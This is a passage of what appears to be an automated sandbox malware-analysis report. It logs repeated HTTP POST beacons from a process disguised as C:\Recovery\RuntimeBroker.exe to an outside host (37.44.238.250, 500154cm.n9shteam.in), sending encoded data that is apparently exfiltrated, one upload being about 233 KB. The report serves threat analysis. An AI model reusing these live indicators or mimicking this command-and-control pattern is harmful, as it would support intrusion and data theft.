                                                                                                            Data Ascii: T_[WVYY_\XZQP_XR[R^_UXZ]__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'-5=(%U!:3!((0!#+"01*5= =Z+%&[!"^.=
                                                                                                            Nov 12, 2024 00:42:39.133013010 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:39.211893082 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:39 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            21192.168.2.44976237.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:39.426619053 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2504
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:39.776876926 CET2504OUTData Raw: 54 5f 5b 5e 56 58 59 5c 5c 58 5a 51 50 5a 58 51 5b 52 5e 5b 55 5f 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: T_[^VXY\\XZQPZXQ[R^[U_Z^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$.=)-U6<:E%%358U*3^"(-U3X!)%Z4#!\<%&[!"^.=
                                                                                                            Nov 12, 2024 00:42:40.012104034 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:40.087781906 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:39 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            22192.168.2.44976337.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:40.590864897 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:40.947431087 CET2512OUTData Raw: 51 55 5e 54 53 5d 59 58 5c 58 5a 51 50 59 58 57 5b 50 5e 51 55 5b 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QU^TS]YX\XZQPYXW[P^QU[Z\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'.0)&5:D$C0^5(4T) 96%W0-*)5705?&[!"^.%
                                                                                                            Nov 12, 2024 00:42:41.175642014 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:41.252226114 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:41 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            23192.168.2.44976437.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:41.396047115 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1840
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            24192.168.2.44976537.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:41.473341942 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:41.822426081 CET2512OUTData Raw: 51 52 5b 56 56 5b 59 5b 5c 58 5a 51 50 52 58 55 5b 51 5e 50 55 58 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QR[VV[Y[\XZQPRXU[Q^PUXZ^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'.1>;S#?90^5 )Y#+)W31[>%1# "+&[!"^.
                                                                                                            Nov 12, 2024 00:42:42.041311026 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:42.121215105 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:41 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            25192.168.2.44976637.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:42.320527077 CET292OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2504
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:42:42.666443110 CET2504OUTData Raw: 51 54 5b 53 53 5c 59 5c 5c 58 5a 51 50 5a 58 52 5b 5c 5e 5d 55 58 5a 59 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QT[SS\Y\\XZQPZXR[\^]UXZY__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$9*>(25<"A036$*3.X5&'.1X=&:Y!0*)%&[!"^.1
                                                                                                            Nov 12, 2024 00:42:42.885449886 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:42.967684984 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:42 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            26192.168.2.44976737.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:43.358318090 CET318OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 232820
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            27192.168.2.44976837.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:43.415626049 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:43.760185957 CET2512OUTData Raw: 51 55 5b 5e 53 5d 59 5a 5c 58 5a 51 50 5d 58 51 5b 52 5e 5a 55 5b 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QU[^S]YZ\XZQP]XQ[R^ZU[ZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$:V6*:5.'0Y ;<) =#(T'6*5!#>+&[!"^.
                                                                                                            Nov 12, 2024 00:42:43.983134985 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:44.069796085 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:43 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            28192.168.2.44976937.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:44.212867022 CET292OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:42:44.557012081 CET2512OUTData Raw: 51 54 5b 54 56 51 59 5d 5c 58 5a 51 50 59 58 54 5b 55 5e 59 55 55 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QT[TVQY]\XZQPYXT[U^YUUZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'.#!*.5?>'53"8R) :Y58$X=*"]73*)5&[!"^.%
                                                                                                            Nov 12, 2024 00:42:44.798010111 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:44.872407913 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:44 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            29192.168.2.44977037.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:45.011274099 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:45.369322062 CET2512OUTData Raw: 54 5f 5b 52 56 5c 5c 58 5c 58 5a 51 50 5e 58 53 5b 5c 5e 5d 55 58 5a 59 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: T_[RV\\X\XZQP^XS[\^]UXZY__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'^-V>>."<@%6(68T(#)!6$"(&>4 &<5&[!"^.9
                                                                                                            Nov 12, 2024 00:42:45.579231977 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:45.661696911 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:45 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            30192.168.2.44977137.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:45.863900900 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2504
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:46.213124990 CET2504OUTData Raw: 51 55 5b 51 53 5d 59 5a 5c 58 5a 51 50 5a 58 56 5b 54 5e 58 55 5a 5a 5f 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QU[QS]YZ\XZQPZXV[T^XUZZ___B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'^- "*5<*A$[!/>>Z5&3*:X7-](&[!"^.!
                                                                                                            Nov 12, 2024 00:42:46.428621054 CET25INHTTP/1.1 100 Continue


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            31192.168.2.44977237.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:46.484870911 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1840
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:46.839109898 CET1840OUTData Raw: 54 54 5b 5f 53 5a 5c 5a 5c 58 5a 51 50 58 58 5d 5b 5d 5e 59 55 5b 5a 5b 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TT[_SZ\Z\XZQPXX][]^YU[Z[__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$- **>!?6E050[5+=3"$-!=%]#0!?&[!"^.!
                                                                                                            Nov 12, 2024 00:42:47.068157911 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:47.147691965 CET308INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:46 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 02 1e 21 10 2b 3d 33 5a 20 3f 24 53 3a 10 03 0f 32 20 2f 02 2b 01 3f 00 22 3d 34 1f 2c 33 3a 0d 37 2d 37 06 27 3a 35 5f 37 3f 00 09 3f 28 21 5b 05 12 22 07 23 5d 3c 55 28 2c 0d 06 2d 31 0d 5b 22 56 28 05 2c 39 2f 53 29 5f 3e 0f 24 12 3e 1e 24 08 3f 07 3a 3d 21 04 2b 3c 37 1e 36 34 2e 55 0b 11 23 50 24 38 27 1d 22 3c 3b 5a 31 3e 38 57 35 03 32 18 26 39 38 54 25 3a 2b 10 25 31 07 01 26 22 0f 06 32 03 36 02 2a 3a 3f 5b 27 3a 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: !+=3Z ?$S:2 /+?"=4,3:7-7':5_7??(!["#]<U(,-1["V(,9/S)_>$>$?:=!+<764.U#P$8'"<;Z1>8W52&98T%:+%1&"26*:?[':#Q-/V=[W


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            32192.168.2.44977337.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:46.647289991 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:46.994502068 CET2512OUTData Raw: 51 53 5b 52 53 5a 59 59 5c 58 5a 51 50 53 58 5c 5b 5d 5e 50 55 54 5a 5d 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QS[RSZYY\XZQPSX\[]^PUTZ]__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\':6>-5600_5+)0:#86'>6)=7V5](5&[!"^.
                                                                                                            Nov 12, 2024 00:42:47.230547905 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:47.307888985 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:47 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            33192.168.2.44977437.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:47.450781107 CET292OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:42:47.806862116 CET2512OUTData Raw: 54 55 5b 52 53 5b 59 5e 5c 58 5a 51 50 58 58 51 5b 52 5e 5f 55 5b 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TU[RS[Y^\XZQPXXQ[R^_U[Z^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'9 *+.6/5$C8Z"+$T)3&[!8-$X1*61 3>+&[!"^.!
                                                                                                            Nov 12, 2024 00:42:48.036242008 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:48.116904974 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:47 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            34192.168.2.44977537.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:48.506356001 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:48.854485035 CET2512OUTData Raw: 54 52 5b 57 56 50 5c 59 5c 58 5a 51 50 5d 58 5c 5b 53 5e 51 55 58 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TR[WVP\Y\XZQP]X\[S^QUXZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$,0!*)#<3'!8#)#&Y";=P'>!*>[7><&[!"^.
                                                                                                            Nov 12, 2024 00:42:49.092678070 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:49.166780949 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:48 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            35192.168.2.44977637.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:49.296787024 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:49.650609016 CET2512OUTData Raw: 54 51 5b 52 53 5a 59 5a 5c 58 5a 51 50 5d 58 51 5b 54 5e 5d 55 58 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
